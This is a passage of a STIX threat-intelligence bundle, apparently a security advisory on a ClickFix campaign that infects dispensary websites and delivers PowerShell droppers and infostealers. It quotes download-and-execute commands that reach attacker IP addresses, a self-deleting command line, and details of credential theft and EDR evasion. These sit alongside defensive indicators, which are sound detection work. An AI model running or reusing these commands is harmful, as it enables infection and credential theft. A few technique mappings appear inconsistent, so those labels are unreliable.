        "relationship--61507db7-5a85-463b-9f03-2121b1e0a775",
        "relationship--77882769-bd05-4642-8181-8754bada72c8",
        "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197",
        "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
        "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
        "relationship--e2f8ee09-7395-4e81-b098-135915184564",
        "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
        "indicator--6799e6b4-56a0-4204-874d-0220b0e85773",
        "process--53c85b31-f98a-45c6-b662-18fb9f681f21",
        "relationship--12606fed-779a-468a-8ab6-9a50fa1ac4c0",
        "relationship--46970cf2-09ca-4f37-b814-38434419b9f0",
        "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
        "relationship--ffea69f3-6d86-4e1b-a388-176e8a92b460",
        "relationship--b2a8ab01-10d1-4322-850a-0e6177314f2b",
        "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
        "relationship--7bb15a7f-6147-4b51-bcfc-193c32a546b3",
        "indicator--731d1857-f08e-4a24-b03e-fa78985fbbd7",
        "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
        "note--77653f1f-5659-4737-9088-663c4f944ab2",
        "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
        "relationship--890c4688-4018-4b9b-853c-eed71012e0bf",
        "relationship--7f0d619c-2eb4-481c-b7b0-ab3eb297f84e",
        "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be",
        "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
        "relationship--92eac3c0-2eee-4ad1-a21b-10e32e608433",
        "relationship--d7ce0ab6-8286-462d-ab7b-8d92e4e5cc9d",
        "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
        "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
        "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5"
      ],
      "external_references": [
        {
          "source_name": "SecureLeaf",
          "description": "SL-ADV-007 Unified Advisory \u2014 Final",
          "url": "https://secureleaf.dispensight.com/advisories/SL-ADV-007"
        },
        {
          "source_name": "AlienVault OTX",
          "description": "JS Clickfix + Windows-specific multi-stage payload",
          "url": "https://otx.alienvault.com"
        }
      ],
      "labels": [
        "SL-ADV-007",
        "unified",
        "final",
        "dispensight",
        "secureleaf",
        "tds",
        "clickfix",
        "shadow-dom",
        "infostealer",
        "donutloader",
        "rozena",
        "as202412",
        "affiliate-platform",
        "march-2026",
        "may-2026",
        "cannabis-retail",
        "process-scos"
      ]
    },
    {
      "type": "identity",
      "spec_version": "2.1",
      "id": "identity--a06f63fe-1ba3-4a52-87ac-5c98f7ea3513",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "SecureLeaf",
      "identity_class": "organization",
      "description": "SecureLeaf \u2013 Cybersecurity & Fraud Detection Division of Dispensight",
      "sectors": [
        "technology",
        "cannabis-retail-security"
      ],
      "contact_information": "SecureLeaf Threat Intelligence | SL-ADV-007"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "OmegaTech Circus",
      "description": "ClickFix/Shadow DOM threat actor operating TDS infrastructure under AS202412 (OmegaTech). Delivers fake Cloudflare CAPTCHA lures leading to PowerShell-based infostealer chains (TR/Rozena.Gen / DonutLoader). Targets cannabis retail and dispensary web properties. Operates dual TDS C2 domains: ntdnewtds.shop (primary) and dnsnewtds.shop (fallback).",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "OmegaTech",
        "AS202412 TDS Actor"
      ],
      "labels": [
        "clickfix",
        "tds",
        "infostealer",
        "crypto-stealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--1f3b8c05-7a58-45b1-b228-6fc7c5ab9c33",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "SL-ADV-007: OmegaTech ClickFix/Shadow DOM Campaign",
      "description": "Multi-stage attack campaign targeting cannabis dispensary websites. WordPress sites compromised via Shadow DOM injection. ClickFix fake Cloudflare CAPTCHA delivers PowerShell clipboard payload. Full chain: JS TDS Loader \u2192 PowerShell Stage-1/2 \u2192 TR/Rozena.Gen \u2192 DonutLoader C2 \u2192 Browser/crypto credential theft. Parallel chain via WScript payload.js \u2192 python312x64 bundle \u2192 Protected.py infostealer with direct-syscall EDR bypass.",
      "first_seen": "2026-01-01T00:00:00Z",
      "last_seen": "2026-05-18T00:00:00.000Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "tds",
        "infostealer",
        "dispensary"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "TDS Stage-1 JS Injector (tji-mu-js)",
      "description": "Obfuscator.io premium JavaScript TDS loader injected into victim WordPress pages via Shadow DOM. Uses RC4+Base64 cipher with 39,565-entry encoded string array and rotation offset 661,915. Guards execution with window.__performance_optimizer_v6 deduplication flag. Fires synchronous XHR GET to ntdnewtds.shop/jsrepo?rnd=<random> (fallback: dnsnewtds.shop). On HTTP 200: creates <script> element, sets .text = responseText, appends to document.head. Contains 4 anti-debug layers, persistent setInterval debugger trap (4000ms), and Function.constructor sandbox escape probe.",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "obfuscator.io",
        "rc4",
        "javascript-injector"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "ClickFix PowerShell Dropper",
      "description": "PowerShell payload placed in clipboard via clipboard.writeText(). User executes via Win+R \u2192 paste \u2192 OK. Stage 1: iex(irm('178.16.52.232')) \u2014 downloads and executes second PS script. Stage 2: IWR http://158.94.208.92 \u2192 IEX $checkResult.Content. Compiles tr0oowwq.dll (TR/Rozena.Gen) via csc.exe from TEMP. Injects compiled DLL into svchost.exe via WriteProcessMemory + CreateRemoteThread.",
      "malware_types": [
        "dropper",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "clickfix",
        "powershell",
        "rozena",
        "process-injection"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "process-injection",
        "anti-vm",
        "data-exfiltration",
        "credential-theft",
        "crypto-wallet-theft"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "TR/Rozena.Gen",
      "description": "DLL payload compiled at runtime by csc.exe from %TEMP%\\tr0oowwq.cmdline. Injected into svchost.exe. Connects to DonutLoader C2 at 158.94.208.104:80. Subsequently injects into chrome.exe. Steals: Chrome history/cookies, Firefox key4.db, Electrum wallet, Jaxx wallet. Performs WMI Win32_VideoController VM detection. Self-deletes via cmd.exe /C ping 1.0.0.1 & del svchost.exe.",
      "malware_types": [
        "infostealer",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "rozena",
        "donutloader",
        "infostealer",
        "crypto-stealer"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "capabilities": [
        "data-exfiltration",
        "credential-theft",
        "browser-data-theft",
        "crypto-wallet-theft",
        "anti-vm",
        "self-deletion",
        "process-injection"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "payload.js WScript Dropper",
      "description": "JScript payload executed via WScript.exe. Performs COM queries (WBEM Locator, WMI, WSH Shell Object) and reads HKCU\\Control Panel\\International\\Geo Nation for geo-targeting. Executes rundll32.exe shell32.dll,ShellExec_RunDLL to launch encoded PowerShell. PowerShell: disables SSL validation, downloads python312x64.zip from filemail.com, extracts to AppData\\Roaming\\Templates\\python312x64\\, launches pythonw.exe Protected.py. Persistence via SyncAppvPublishingServer LOLBin (hidden PowerShell).",
      "malware_types": [
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "wscript",
        "lolbin",
        "python-dropper",
        "geo-targeted"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "jscript",
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "anti-vm",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Protected.py Python Infostealer",
      "description": "Python payload (Protected.py) executed by pythonw.exe (3 instances: PIDs 1752, 3152, 5032). Loads PyCryptodome (AES, RSA, ECC, ChaCha20). Drops wc*.tmp PE files to %TEMP%, maps into memory, then deletes from disk (fileless execution). Uses direct NT syscalls (NtCreateFile, NtReadFile, NtWriteFile) to bypass EDR. DLL load proxy for ntdll.dll and cryptsp.dll from RWX memory. Custom stack switching for stack trace evasion. Injection target: wab.exe via NtMapViewOfSection + NtSetContextThread.",
      "malware_types": [
        "infostealer",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "python",
        "edr-bypass",
        "direct-syscalls",
        "fileless",
        "process-injection"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "python"
      ],
      "capabilities": [
        "data-exfiltration",
        "process-injection",
        "anti-debugging",
        "anti-vm",
        "obfuscated-payloads",
        "remote-code-execution"
      ]
    },
    {
      "type": "tool",
      "spec_version": "2.1",
      "id": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "DonutLoader",
      "description": "Shellcode-based in-memory loader. C2 at 158.94.208.104:80.",
      "tool_types": [
        "exploitation"
      ],
      "labels": [
        "donutloader",
        "shellcode-loader",
        "c2"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2",
      "description": "Primary Traffic Distribution System endpoint. Serves remote JS payload via /jsrepo?rnd=<random>.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "ntdnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2",
      "description": "Fallback TDS endpoint, queried if ntdnewtds.shop fails.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "dnsnewtds",
        "fallback"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "178.16.52.232 \u2014 PowerShell Stage-1 Host",
      "description": "Hosts first-stage PowerShell payload retrieved by Invoke-RestMethod.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "powershell",
        "stage1",
        "iex",
        "irm"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "158.94.208.92 \u2014 PowerShell Stage-2 Host",
      "description": "Hosts second-stage PowerShell payload (IWR + IEX). Triggers csc.exe compilation of Rozena DLL.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "powershell",
        "stage2",
        "rozena",
        "csc"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "158.94.208.104:80 \u2014 DonutLoader C2",
      "description": "DonutLoader command-and-control endpoint. Contacted by injected svchost.exe.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "donutloader",
        "c2",
        "post-injection"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "3004.filemail.com \u2014 Python Payload Host",
      "description": "Hosts python312x64.zip containing pythonw.exe + Protected.py infostealer bundle.",
      "infrastructure_types": [
        "staging"
      ],
      "labels": [
        "filemail",
        "python",
        "zip-dropper",
        "staging"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--be5d21db-c597-4746-bf93-f0f207cb2fb1",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop",
      "description": "Primary TDS C2 domain. Serves obfuscated JS payload at /jsrepo endpoint.",
      "indicator_types": [
        "malicious-activity",
        "compromised"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "primary"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--31d4b9ba-b028-4cce-881e-b0e7de7985e2",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop",
      "description": "Fallback TDS C2 domain.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "fallback"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4c4a571f-ea83-4dd4-9dc7-32b54aad4077",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 178.16.52.232 \u2014 PS Stage-1",
      "description": "PowerShell Stage-1 host. Invoked via iex(irm(('178.'+'16')+(...)+'232'))).",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '178.16.52.232']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage1",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e0d5f982-3635-4811-a7c1-6f46455efe27",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 158.94.208.92 \u2014 PS Stage-2",
      "description": "PowerShell Stage-2 host. IWR + IEX triggers csc.exe Rozena compilation.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '158.94.208.92']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage2",
        "rozena"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--91538353-23f6-42ba-9b8e-a77b8c7ef1d6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 158.94.208.104:80 \u2014 DonutLoader C2",
      "description": "DonutLoader C2. Contacted by svchost.exe post-injection.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '158.94.208.104']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "donutloader",
        "c2",
        "port-80"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d2c06d08-5ab3-4100-b7e0-4eeeaea9258b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "URL Pattern: /jsrepo?rnd= endpoint",
      "description": "TDS payload delivery endpoint pattern. Cache-busted with Math.random() suffix.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns)newtds\\.shop/jsrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "payload-delivery",
        "jsrepo"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c74a3775-b069-4570-8a17-270bb4519c77",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: Raw obfuscated JS payload (god-help-me.js)",
      "description": "Raw obfuscator.io premium Stage-1 TDS loader. 1,283,726 bytes. RC4+Base64 cipher, 39,565-entry string array, rotation offset 661,915.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'f29926ae72794dde60ae1d57d97c5781' OR file:hashes.'SHA-1' = 'f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0' OR file:hashes.'SHA-256' = 'b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "stage1",
        "obfuscator.io",
        "tds-loader"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: Prettified JS payload (stuff.js)",
      "description": "Prettified/partially-deobfuscated variant of Stage-1 loader. 844,866 bytes. Cipher intact; structural analysis confirmed identical behaviour.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'ff1d1a915f7a4a1df4a16e0dd2990241' OR file:hashes.'SHA-1' = 'abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5' OR file:hashes.'SHA-256' = 'ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "stage1",
        "prettified",
        "analysis-artifact"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--185dea0e-c306-46a5-ab00-efb8b36106b7",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "DOM: script id=tji-mu-js + window.__performance_optimizer_v6",
      "description": "Injected script element carries id='tji-mu-js'. Deduplication guard: window.__performance_optimizer_v6 checked before execution.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[network-traffic:extensions.'http-request-ext'.request_header.'X-Custom' MATCHES 'tji-mu-js']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "dom-injection",
        "guard-flag",
        "script-id"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79c3034f-50e5-4ad7-884d-80dfafe59bdf",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: %TEMP%\\tr0oowwq.dll (TR/Rozena.Gen)",
      "description": "Rozena DLL compiled at runtime by csc.exe from tr0oowwq.cmdline in TEMP directory.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'tr0oowwq.dll' AND file:parent_directory_ref.path MATCHES '(?i)temp']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "rozena",
        "csc-compiled",
        "temp-dll"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--acdfce08-d674-4e7f-b3ba-7d2c702e66da",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: python312x64.zip + Protected.py",
      "description": "Python infostealer bundle. Extracted to AppData\\Roaming\\Templates\\python312x64\\.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'python312x64.zip' OR file:name = 'Protected.py']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "python-dropper",
        "protected.py",
        "infostealer"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41f15b3b-22f9-4c4f-bef1-68b1c60acc3d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: wc*.tmp PE files in %TEMP%",
      "description": "Temporary PE files dropped by Protected.py, loaded into memory then deleted (fileless execution).",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name MATCHES '^wc.*\\.tmp$' AND file:parent_directory_ref.path MATCHES '(?i)temp']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "fileless",
        "pe-dropper",
        "protected.py"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6aa035e5-44c0-490f-8bdc-82446b99d9a3",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Process: SyncAppvPublishingServer LOLBin persistence",
      "description": "payload.js uses SyncAppvPublishingServer LOLBin to launch hidden PowerShell for Protected.py persistence.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[process:command_line MATCHES '(?i)SyncAppvPublishingServer']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "lolbin",
        "persistence",
        "hidden-powershell"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e4dbccb9-8458-43c1-a1ce-58678d9007f8",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Process: wab.exe injection target (3 instances)",
      "description": "Protected.py injects into wab.exe via NtMapViewOfSection + NtSetContextThread. PIDs 1752, 3152, 5032 observed.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[process:name = 'wab.exe' AND process:is_hidden = true]",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "process-injection",
        "wab.exe",
        "nt-syscalls",
        "edr-bypass"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7612c7bf-3153-4a0c-b6c7-b030634e93cb",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.001 \u2014 Command and Scripting Interpreter: PowerShell",
      "description": "PowerShell used throughout: stage-1 IRM/IEX download, stage-2 payload execution, Protected.py launcher.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/001",
          "external_id": "T1059.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--99f2ace8-7793-4317-b1db-7b16dc824413",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.005 \u2014 Command and Scripting Interpreter: Visual Basic / JScript",
      "description": "payload.js executed via WScript.exe as JScript dropper.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/005",
          "external_id": "T1059.005"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--57b7b160-ed4d-4490-bb90-78991009371f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "Stage-1 TDS loader is an obfuscated JavaScript injected into victim browser via WordPress page.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f313fb9c-74e6-49bb-80d9-02606d618988",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims lured to compromised dispensary websites hosting injected TDS JS.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b04983-fe4e-491f-9481-f738ad87890b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "Stage-1 JS uses obfuscator.io premium RC4+Base64 cipher with 39,565-entry encoded string array.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--922f869e-8c22-42fb-ab24-ac3bef8d1d0c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1027.010 \u2014 Obfuscated Files or Information: Command Obfuscation",
      "description": "PowerShell stage-1 string-splits IP: ('178.'+'16')+('+'.52.'+'232')). Encoded PS -EncodedCommand used by payload.js.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5fdadf5e-da2b-4f42-9621-876da67b4672",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1055.001 \u2014 Process Injection: Dynamic-link Library Injection",
      "description": "TR/Rozena.Gen injected into svchost.exe and chrome.exe via WriteProcessMemory + CreateRemoteThread.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/001",
          "external_id": "T1055.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0b92f6a8-147e-4a48-ad1f-629aa22a00fa",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1055.013 \u2014 Process Injection: Process Doppelg\u00e4nging / NtMapViewOfSection",
      "description": "Protected.py injects into wab.exe via NtMapViewOfSection + NtSetContextThread (direct NT syscalls).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/013",
          "external_id": "T1055.013"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1106 \u2014 Native API",
      "description": "Protected.py uses direct NT syscalls (NtCreateFile, NtReadFile, NtWriteFile) to bypass EDR hooks.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1106",
          "external_id": "T1106"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19f54e44-5a76-4319-a03f-600ed5c58fdd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1218.011 \u2014 System Binary Proxy Execution: Rundll32",
      "description": "payload.js uses rundll32.exe shell32.dll,ShellExec_RunDLL to launch encoded PowerShell.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1218/011",
          "external_id": "T1218.011"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4ad400f6-3d74-41af-be79-d45383f0e37d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1218.004 \u2014 System Binary Proxy Execution: InstallUtil / SyncAppvPublishingServer",
      "description": "SyncAppvPublishingServer LOLBin used to launch hidden persistent PowerShell for Protected.py.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1218/004",
          "external_id": "T1218.004"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--753a2633-e834-4ba8-a846-96dfd1bb7ed6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
